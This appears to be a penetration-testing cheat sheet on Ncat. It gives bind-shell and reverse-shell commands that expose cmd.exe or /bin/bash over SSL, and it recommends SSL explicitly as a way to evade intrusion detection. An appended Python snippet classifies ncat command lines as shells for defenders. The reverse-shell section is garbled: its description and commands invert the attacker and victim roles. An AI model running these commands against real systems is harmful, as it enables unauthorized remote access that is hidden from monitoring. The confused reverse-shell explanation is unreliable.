Ncat

Improved version of netcat (e.g. with encrypted communication).

Feature-packed networking utility that reads and writes data across networks from the command line. Ncat runs in two modes: client and server.

One of the major drawbacks of Netcat, from a penetration tester's standpoint, is that it cannot authenticate or encrypt incoming and outgoing connections. These options provide an important layer of security when using such tools during a penetration test. Encrypting the bind or reverse shell helps the penetration tester avoid intrusion detection systems, and restricting who may connect to a bind or reverse shell ensures that using these tools does not expose the penetrated machines to unwanted IP addresses.

Get a Windows command prompt from a Kali Linux machine (bind shell)

Bind shell: Attacker (Kali Linux) gets remote command prompt access on Victim’s machine (Windows)

# Shows the Windows command prompt on the Kali machine
KALI_IP=x.x.x.x
VICTIM_IP=x.x.x.x

# On Victim machine (Windows):
#     Listen on port 4444 and execute cmd.exe for whatever connects
#     Wrap the connection on port 4444 in SSL
#     Allow only the Attacker's IP to connect
ncat --exec cmd.exe --allow $KALI_IP -vnl 4444 --ssl

# On the Attacker's machine (Kali Linux)
# Connect to Victim's public IP with SSL encryption enabled,
# preventing eavesdropping, and possibly even IDS detection
ncat -v $VICTIM_IP 4444 --ssl

Get a Windows command prompt from a Kali Linux machine (reverse shell)

Reverse shell: Victim (Windows) connects to Attacker (Kali Linux)

KALI_IP=x.x.x.x
VICTIM_IP=x.x.x.x

# Victim (Windows) listens on port 4444, SSL-wrapped, accepting only the Attacker's IP
ncat --allow $KALI_IP -vnl 4444 --ssl

# Attacker (Kali Linux) sends a reverse shell from their machine to Victim
# Attacker's ncat redirects stdin, stdout and stderr of /bin/bash
# to Victim's machine on port 4444 (--exec, not -exec: ncat would read
# the single-dash form as -e with the argument "xec")
ncat -v $VICTIM_IP 4444 --exec /bin/bash --ssl
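Defender's counterpart to the two command shapes above (an added example, not from these notes): a small Python classifier that parses a captured ncat command line, recognising bundled short flags such as -vnl and glued values such as -ecmd.exe, and labels it a bind shell (listen plus an exec option) or a reverse shell (exec option without listen), while reporting whether --ssl and --allow were present. It assumes the input is the full command line as recorded by process-creation logging; the addresses used when exercising it are constructed.

```python
"""Classify ncat command lines (e.g. from process-creation telemetry) as bind or
reverse shells and report whether --ssl / --allow were used. Added example, not
from the original notes; any sample command lines fed to it are constructed."""
import shlex

SHORT_WITH_ARG = set("ceGgmdoxipsw")  # ncat short options that consume a value
LONG_WITH_ARG = {
    "--exec", "--sh-exec", "--lua-exec", "--allow", "--allowfile", "--deny",
    "--denyfile", "--proxy", "--proxy-type", "--proxy-auth", "--proxy-dns",
    "--ssl-cert", "--ssl-key", "--ssl-trustfile", "--ssl-ciphers",
    "--ssl-servername", "--ssl-alpn", "--max-conns", "--delay", "--output",
    "--hex-dump", "--idle-timeout", "--source-port", "--source", "--wait"}
EXEC_OPTS = {"-c", "-e", "--exec", "--sh-exec", "--lua-exec"}

def parse_ncat(cmdline):
    """Extract the flags relevant to shell detection from one ncat command line."""
    argv = shlex.split(cmdline)
    info = {"listen": False, "exec": None, "ssl": False, "ssl_verify": False,
            "allow": [], "targets": []}
    i = 1
    while i < len(argv):
        tok, name, value = argv[i], None, ""
        if tok.startswith("--"):                 # long option, --opt or --opt=value
            name, eq, value = tok.partition("=")
            if name == "--listen": info["listen"] = True
            elif name == "--ssl": info["ssl"] = True
            elif name == "--ssl-verify": info["ssl_verify"] = True
            elif name in LONG_WITH_ARG and not eq:
                i += 1; value = argv[i] if i < len(argv) else ""
        elif tok.startswith("-") and len(tok) > 1:  # bundled short flags, e.g. -vnl
            for j, ch in enumerate(tok[1:], start=1):
                if ch == "l": info["listen"] = True
                elif ch in SHORT_WITH_ARG:       # rest of the bundle is its value
                    name, value = "-" + ch, tok[j + 1:]
                    if not value:
                        i += 1; value = argv[i] if i < len(argv) else ""
                    break
        else:
            info["targets"].append(tok)          # host and/or port
        if name in EXEC_OPTS: info["exec"] = value
        elif name == "--allow": info["allow"].append(value)
        i += 1
    return info

def classify(cmdline):
    """Return (kind, ssl, allow); kind is 'bind-shell', 'reverse-shell' or None."""
    info = parse_ncat(cmdline)
    kind = None if info["exec"] is None else (
        "bind-shell" if info["listen"] else "reverse-shell")
    return kind, info["ssl"], bool(info["allow"])
```

The ssl_verify field is kept separately because --ssl alone only encrypts; ncat checks the peer's certificate only when --ssl-verify is given, so an --ssl listener restricted by --allow is filtered by source IP, not authenticated.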